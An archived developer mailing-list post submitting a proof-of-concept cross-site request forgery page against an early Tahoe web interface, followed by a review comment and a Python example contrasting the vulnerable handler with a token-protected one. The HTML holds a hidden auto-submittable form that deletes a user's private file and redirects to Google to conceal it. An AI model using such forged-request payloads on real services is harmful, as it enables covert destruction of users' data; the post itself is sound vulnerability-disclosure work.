[tahoe-dev] Example XSRF attack.
Nathan
nejucomo at gmail.com
Sun Aug 19 17:38:40 PDT 2007
Hi folks,
Since I've only recently learned about XSRF attacks, I have little
practical experience with them. I suspected the current webapi was
vulnerable to such attacks, but wanted a proof-of-concept. Here it
is.
One misconception I hope this points out is that Javascript security
constraints are certainly not adequate to rely on.
This example shows how subtle such attacks can be. In the wild I
would easily miss having launched this attack, and I bet most
security-conscious surfers would also. I'm not too familiar with HTML
and Javascript, but this attack took me about 20 minutes to write
(including Googling for examples).
Regards,
Nathan
ps: Darcs patch attached, and human-readable diff follows:
Sun Aug 19 18:21:38 MDT 2007 nejucomo at gmail.com
* This example XSRF attack deletes private data.
It's an html page which describes its own operation.
diff -rN -u old-tahoe/docs/example-xsrf-attack.html
new-tahoe/docs/example-xsrf-attack.html
--- old-tahoe/docs/example-xsrf-attack.html 1969-12-31 17:00:00.000000000 -0700
+++ new-tahoe/docs/example-xsrf-attack.html 2007-08-19 18:29:40.000000000 -0600
@@ -0,0 +1,81 @@
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
+<html>
+ <head>
+ <title>Example XSRF attach against Tahoe v0.5</title>
+ </head>
+
+ <body>
+ <h1>Example XSRF attach against Tahoe v0.5</h1>
+
+ <p>
+ <b>NOTE:</b> This page contains an attack triggered by a link
+ clearly labeled "ATTACK LINK". Other links should be benign.
+ </p>
+
+ <p>
+ This serves as an example XSRF attack against Tahoe v0.5. If the
+ requisite conditions are met, then clicking on an innocuous looking
+ link below will delete your private Tahoe contents.
+ </p>
+
+ <p>
+ This example illustrates how stealthy such attacks can be.
+ If successful, the user may easily believe they followed a simple
+ link to Google, when actually they deleted private Tahoe contents.
+ </p>
+
+ <h2>Requisite Conditions</h2>
+ <ol>
+ <li>
+ Your private vdrive has a file named "xsrf/targetdata".
+ (If this example succeeds this path will be deleted!)
+ </li>
+ <li>
+ Your Tahoe node is running with a web interface listening to
+ <a href="http://localhost:8080/">http://localhost:8080/</a>.
+ </li>
+ <li>
+ Your browser has Javascript enabled.
+ </li>
+ </ol>
+
+ <p>
+ Notice, this attack could come from any source (such as another
+ website, or html-enabled email) so long as the browser has Tahoe
+ access.
+ </p>
+
+ <h2>Attack Trigger</h2>
+
+ <p>
+ This paragraph contains a hidden html payload for the attack.
+ <div style="display:none;">
+ <form
+ method="post"
+ name="htmlAttackPayload"
+ action="http://localhost:8080/vdrive/private/xsrf">
+
+ <input type="hidden" name="t" value="delete">
+ <input type="hidden" name="name" value="targetdata">
+ <input type="hidden" name="when_done" value="http://www.google.com">
+ </form>
+ </div>
+ </p>
+
+ <p>
+ If the attack is successful, you should be redirected to www.google.com.
+ </p>
+
+ <p>
+ Click this <a
+ href="javascript:document.htmlAttackPayload.submit();">ATTACK
+ LINK</a> to launch the attack.
+ </p>
+
+ <hr>
+<!-- Created: Sun Aug 19 17:41:32 MDT 2007 -->
+<!-- hhmts start -->
+Last modified: Sun Aug 19 18:21:36 MDT 2007
+<!-- hhmts end -->
+ </body>
+</html>
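Review bot: the title and h1 near the top of the hunk read "Example XSRF attach against Tahoe v0.5"; that should be "attack", matching the commit message and the rest of the page. Further down, the hidden `<div>` is nested inside the `<p>` that says "This paragraph contains a hidden html payload": HTML 4.01 allows only inline content in `<p>`, so browsers implicitly close the paragraph at the `<div>` and the later `</p>` becomes a stray end tag; move the `<div style="display:none;">` block after that `</p>` (the hidden form works just as well as a sibling). At the bottom, the `<!-- hhmts start -->`/`<!-- hhmts end -->` comments and the "Last modified" line are Emacs time-stamp artifacts that will drift from the file's real history; drop them before this lands in docs/. Since the file is user-facing documentation, one sentence on the fix side (the webapi must require something in the request that a third-party page cannot supply, such as an unguessable per-user token) would let readers pair the proof of concept with the mitigation.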
-------------- next part --------------
A non-text attachment was scrubbed...
Name: xsrf-example.patch
Type: text/x-patch
Size: 38544 bytes
Desc: not available
Url : http://allmydata.org/pipermail/tahoe-dev/attachments/20070819/54aa30d1/attachment-0001.bin
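The post shows a forged POST succeeding because the webapi handler accepts any `t=delete` request that arrives with the browser's ambient authority. The following is an added example (not Tahoe code and not part of Nathan's patch) that models that handler pattern next to a hardened version using a per-session synchronizer token. `Request`, `VDrive`, `TokenStore`, `handle_delete_unprotected` and `handle_delete_protected` are stand-ins invented for this illustration; the form fields and the `/vdrive/private/xsrf` path are taken from the page.

```python
"""Why the forged form in the post succeeds, and how a per-session
token stops it. Added example, not Tahoe's webapi: the request model
and handlers are simplified stand-ins for the real code."""
import hmac
import secrets
from dataclasses import dataclass

PRIVATE_ROOT = "/vdrive/private/"


@dataclass
class Request:
    """Minimal model of a browser POST: the form fields plus the session
    the browser attaches automatically (the ambient authority an XSRF
    page rides on)."""
    method: str
    path: str
    form: dict
    session_id: str


class VDrive:
    """Stand-in for the private vdrive: just a set of paths."""
    def __init__(self, paths):
        self.paths = set(paths)

    def delete(self, path):
        self.paths.discard(path)


def target_of(req):
    """Map the URL under the private root plus the 'name' field to the
    vdrive path being deleted (e.g. /vdrive/private/xsrf + targetdata)."""
    parent = req.path[len(PRIVATE_ROOT):].rstrip("/")
    return parent + "/" + req.form["name"]


def handle_delete_unprotected(req, vdrive):
    """The pattern the PoC exploits: any POST with t=delete is honoured,
    because nothing in the request proves the user intended it."""
    if req.method != "POST" or req.form.get("t") != "delete":
        return "400 bad request"
    vdrive.delete(target_of(req))
    return "302 " + req.form.get("when_done", "/")


class TokenStore:
    """One unguessable token per session, issued when the legitimate
    page is rendered and embedded in its forms as a hidden field."""
    def __init__(self):
        self._tokens = {}

    def issue(self, session_id):
        tok = secrets.token_urlsafe(32)
        self._tokens[session_id] = tok
        return tok

    def valid(self, session_id, presented):
        expected = self._tokens.get(session_id)
        if expected is None or presented is None:
            return False
        # Constant-time comparison on bytes; a non-ASCII token is simply wrong.
        return hmac.compare_digest(expected.encode(), str(presented).encode())


def handle_delete_protected(req, vdrive, tokens):
    """Same operation, but the request must carry the token that only a
    same-origin page could have read and embedded. A third-party page can
    make the browser send the POST, yet cannot read the token."""
    if req.method != "POST" or req.form.get("t") != "delete":
        return "400 bad request"
    if not tokens.valid(req.session_id, req.form.get("token")):
        return "403 missing or invalid token"
    vdrive.delete(target_of(req))
    return "302 " + req.form.get("when_done", "/")


# Constructed scenario mirroring the hidden form in the post.
FORGED_FORM = {"t": "delete", "name": "targetdata",
               "when_done": "http://www.google.com"}


def demo_unprotected():
    """Forged form against the unguarded handler: the file is gone and the
    user lands on Google, exactly as the page describes."""
    vd = VDrive({"xsrf/targetdata", "other/file"})
    req = Request("POST", PRIVATE_ROOT + "xsrf", dict(FORGED_FORM), "sess-1")
    return handle_delete_unprotected(req, vd), sorted(vd.paths)


def demo_protected():
    """Same forged form against the token-checked handler is refused; the
    real page, which embeds the issued token, still works."""
    vd = VDrive({"xsrf/targetdata", "other/file"})
    tokens = TokenStore()
    tokens.issue("sess-1")
    forged = Request("POST", PRIVATE_ROOT + "xsrf", dict(FORGED_FORM), "sess-1")
    forged_status = handle_delete_protected(forged, vd, tokens)
    legit_form = dict(FORGED_FORM, token=tokens.issue("sess-1"))
    legit = Request("POST", PRIVATE_ROOT + "xsrf", legit_form, "sess-1")
    legit_status = handle_delete_protected(legit, vd, tokens)
    return forged_status, legit_status, sorted(vd.paths)


if __name__ == "__main__":
    print("unprotected:", demo_unprotected())
    print("protected:  ", demo_protected())
```

The token is what the `javascript:` link in the post cannot obtain: the same-origin policy stops a page on another origin from reading the Tahoe form, so it can only replay fields it already knows. Referer checks were the other common 2007-era defence, but a token bound to the session fails closed when the header is missing.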